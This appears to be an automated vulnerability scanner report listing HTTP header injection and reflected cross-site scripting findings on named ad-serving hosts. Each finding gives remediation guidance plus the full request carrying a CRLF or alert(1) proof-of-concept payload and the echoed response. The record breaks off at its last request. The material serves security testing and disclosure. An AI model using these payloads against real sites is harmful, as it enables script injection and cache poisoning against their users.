HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 98e82%0d%0a76a5e13095a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /98e82%0d%0a76a5e13095a/can.en.aff.packseek/;tile=1;sz=728x90;dcopt=ist;pos=1;ord=9552020735? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.packageseeker.com/exchange/en/packageSeeker/home/travelDeals.jsp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/98e82 76a5e13095a/can.en.aff.packseek/%3Btile%3D1%3Bsz%3D728x90%3Bdcopt%3Dist%3Bpos%3D1%3Bord%3D9552020735: Date: Thu, 25 Nov 2010 03:22:36 GMT Server: GFE/2.0
The value of the ADCUserID cookie is copied into the Set-cookie response header. The payload 42420%0d%0a917ff1327c0 was submitted in the ADCUserID cookie. This caused a response containing an injected HTTP header.
Request
GET /adcentric/form/1679/2/48846;id=24577 HTTP/1.1 Host: adc2.adcentriconline.com Proxy-Connection: keep-alive Referer: http://assets.adcentriconline.com/adc2_creatives/1679/12370/BANNER_2.swf Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 1679-1-48846=12370; ADCUserID=42420%0d%0a917ff1327c0
The value of the ADCUserID cookie is copied into the Set-cookie response header. The payload bf0b4%0d%0ad950371efe9 was submitted in the ADCUserID cookie. This caused a response containing an injected HTTP header.
Request
GET /adcentric/tag/1679/1/48846?ADCadcifr=1&secure=false&number=0.8746649911627173 HTTP/1.1 Host: adc2.adcentriconline.com Proxy-Connection: keep-alive Referer: http://en.canoe.ca/home.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ADCUserID=bf0b4%0d%0ad950371efe9
The value of the gclid request parameter is copied into the Location response header. The payload 3ddc4%0d%0ad12b749299a was submitted in the gclid parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/AdServer.bs?cn=ccs&ebcmp=10024154&ebkw=14755179&advid=14140&ebag=254128&sead=5994273590&ccsurl=$$http://www.acs-inc.com/information-technology-outsourcing.aspx?utm_campaign=ACS_IT&utm_medium=cpc&utm_source=Google&utm_term=IT_Consulting$$&gclid=3ddc4%0d%0ad12b749299a HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: E2=08.I820wrF066N820wrV06Bz820wrm07l0820wrU077T820wrt02WGm5xorY07ftg410rN0a4cg410rM03Mo820wrG0apK820wrU07SK820wrM04uwg210rm0bnAo61wrM09KL820wrB; A2=fkeq9MHl0a4c0000820wrM7Iq09Ki403Mo0000820wrGeoI79FWT077T0000820wrte8Pq9PnD0apK0000820wrUfn3P9MHm0a4c0000820wrMeYSU9K9V08.I0000820wrFe5f79MHk07SK0000820wrMd4wf9ADI04uw0000820wreeicB9PMC066N0000820wrVeWk99QTI02WG0000820wrYePYM9Pla07l00000820wrUf8gM9QTI02WG9QTJe3wUrYfnfJ9MZe07ft0000820wrNe96Q9DzZ04uw0000820wrmehqN9DzW06Bz0000820wrmeLLf9Mw60bnA0000o61wrMeOls9MZc07ft0000820wrNcZyK9IMO09KL0000820wrB; B2=4VLS0820wrM52DV0820wre49Zx0820wrG6.ws0820wrF6msk0820wrB7dNR0820wrY7dNS0e3wUrY6Y5t0820wrU6SKC0820wrt7d1H0o61wrM7c7l0820wrN5svs0820wrU7ycg0820wrN6VE50820wrm67xs0820wrm7hMh0g410rM704G0820wrV; C3=0uP4m5xorY0000w00_0lN6820wrG0000004_0t3m820wrm0000004_0ppC820wrU000000g_0uyM820wrN0000001_0rCe820wrm0000002_0nCJ820wrM000000g_0vsV820wrN0000001_0oLK820wrB000000g_0o2A820wre000000w_0tIT820wrt00000w0_0ub+820wrF0000001_0q+Y820wrU0000040_0nez820wrV0000010_0uXig410rM0000002_0u72o61wrM0000004_; D3=0oLK00Hs820wrB0q+Y07jq820wrU0lN600w1820wrG0u7202Rfo61wrM0nCJ02bP820wrM0uXi00Y3g410rM0tIT02fx820wrt0ub+01Cq820wrF0uyM005D820wrN0uP400dDm5xorY0o2A03sH820wre0t3m0053820wrm0rCe0053820wrm0nez01B9820wrV0vsV00as820wrN0ppC007X820wrU; u2=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf0c8'-alert(1)-'99f6756b9a2 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=bf0c8'-alert(1)-'99f6756b9a2 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7207 Cache-Control: no-cache Pragma: no-cache Date: Thu, 25 Nov 2010 03:23:25 GMT Expires: Thu, 25 Nov 2010 03:23:25 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=bf0c8'-alert(1)-'99f6756b9a2http://www.waldorfastoria.com/bestofwaldorfastoria?WT.mc_id=zWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632&cssiteid=1004575&csdartid=5603020439232393\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4e6"-alert(1)-"393bdbf10bd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=6b4e6"-alert(1)-"393bdbf10bd HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7207 Cache-Control: no-cache Pragma: no-cache Date: Thu, 25 Nov 2010 03:23:20 GMT Expires: Thu, 25 Nov 2010 03:23:20 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=6b4e6"-alert(1)-"393bdbf10bdhttp://www.waldorfastoria.com/bestofwaldorfastoria?WT.mc_id=zWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632&cssiteid=1004575&csdartid=5603020439232393"); var fscUrl = url; var fscUrlClickTagFound = fa ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e40b"-alert(1)-"0bd3d85d780 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA5e40b"-alert(1)-"0bd3d85d780&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:20:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... xU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA5e40b"-alert(1)-"0bd3d85d780&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%2 ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9602b'-alert(1)-'f13f8625afd was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA9602b'-alert(1)-'f13f8625afd&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:20:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... xU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA9602b'-alert(1)-'f13f8625afd&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%2 ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 244e8"-alert(1)-"214cc8b87e2 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344244e8"-alert(1)-"214cc8b87e2&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:22:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344244e8"-alert(1)-"214cc8b87e2&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D5603020439232393"); var fscUrl = url; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862a1'-alert(1)-'49b987d72cc was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344862a1'-alert(1)-'49b987d72cc&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:22:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344862a1'-alert(1)-'49b987d72cc&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssiteid%3D1004575%26csdartid%3D5603020439232393\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload febe9"-alert(1)-"13acb3502b9 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5552.3159.GOOGLECN.COM/B4896920.18;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=B-YKuIc_tTL_fD4u0sQeTq-HrD6ejw8wBj9mNmR-v4fLfQgAQARgBIJPFkxU4AFCHuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1febe9"-alert(1)-"13acb3502b9&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=;ord=525715793? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 25 Nov 2010 03:21:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7261
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Nov 05 15:13:18 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... HuvyS-_____8BYMmG7YiEpOwPsgEOd2lraXRyYXZlbC5vcme6AQoxNjB4NjAwX2FzyAEJ2gFCaHR0cDovL3dpa2l0cmF2ZWwub3JnL2VuL1Rvcm9udG9hMzMzZS8nJTNCYWxlcnQoMSkvYWY4MTI5ZjdiNTQveDIymAKeCrgCGMACAcgC1-qjFKgDAfUDAAAARA&num=1febe9"-alert(1)-"13acb3502b9&sig=AGiWqtw0gD0P1sHXR_gsepTqGEsqyyW9iA&client=ca-pub-7695515998152344&adurl=http%3a%2f%2fwww.waldorfastoria.com/bestofwaldorfastoria%3FWT.mc_id%3DzWAWAAA0US1WA2DMH3Google4BestofWinter7BR840632%26cssit ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 472d0'-alert(1)-'dbef4414a82 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
